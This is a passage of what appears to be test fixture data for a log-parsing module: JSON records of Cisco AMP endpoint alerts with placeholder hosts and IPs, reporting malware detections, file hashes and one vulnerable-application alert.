"Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "input.type": "log", - "log.offset": 44582, - "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:22:00.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669929038643250", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 973000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669929038643000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 45938, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:21:00.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669671340605487", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 333000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669671340605000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 49902, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:20:59.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669667045638188", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 779000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669667045638000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 53873, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:20:00.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "f5:8f:96:c3:53:1c" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 1107296279, - "cisco.amp.file.disposition": "Clean", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.cve": [ - "CVE-2015-7204" - ], - "cisco.amp.related.mac": [ - "f5:8f:96:c3:53:1c" - ], - "cisco.amp.timestamp_nanoseconds": 0, - "cisco.amp.vulnerabilities": [ - { - "cve": "CVE-2015-7204", - "name": "Mozilla Firefox", - "score": "6.8", - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204", - "version": "41.0" - } - ], - "event.action": "Vulnerable Application Detected", - "event.category": [ - "file" - ], - "event.dataset": "cisco.amp", - "event.id": 15210587194928, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 1, - "event.start": "2021-01-15T10:20:00.000Z", - "file.hash.sha256": "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f", - "file.name": "firefox.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Exploit_Prevention", - "host.name": "Demo_AMP_Exploit_Prevention", - "input.type": "log", - "log.offset": 55192, - "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", - "related.hash": [ - "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" - ], - "related.hosts": [ - "Demo_AMP_Exploit_Prevention" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:19:59.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669409347600427", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 257000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669409347600000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 56650, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:19:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669405052633129", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 847000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669405052633000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 59295, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669147354595368", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 375000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669147354595000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 60614, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:57.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669143059628070", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 968000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669143059628000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 63259, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:25.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259286289612895", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 669000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259286289613000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 64578, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:13.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259234750005342", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 657000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259234750005000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 65897, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:01.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259183210397789", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 645000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259183210398000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 67216, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "e1:e5:94:ea:a5:44" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6180335966167760897", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "e1:e5:94:ea:a5:44" - ], - "cisco.amp.timestamp_nanoseconds": 875000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6180335966167761000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b2e15a06b0cca8a926c94f8a8eae3d88", - "file.hash.sha1": "f9b02ad8d25157eebdb284631ff646316dc606d5", - "file.hash.sha256": "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", - "file.name": "Fax.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Upatre", - "host.name": "Demo_Upatre", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 68535, - "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", - "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "process.name": "explorer.exe", - "process.pid": 3164, - "related.hash": [ - "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", - "b2e15a06b0cca8a926c94f8a8eae3d88", - "f9b02ad8d25157eebdb284631ff646316dc606d5" - ], - "related.hosts": [ - "Demo_Upatre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:57.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668885361590309", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 672000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668885361590000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 70133, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:50.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259135965757532", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 8000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259135965757000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 74097, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:41.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.event_type_id": 1107296272, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 291000000, - "event.action": "Executed malware", - "event.category": [ - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 1489955900291000600, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:17:41.000Z", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "input.type": "log", - "log.offset": 75414, - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:40.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": 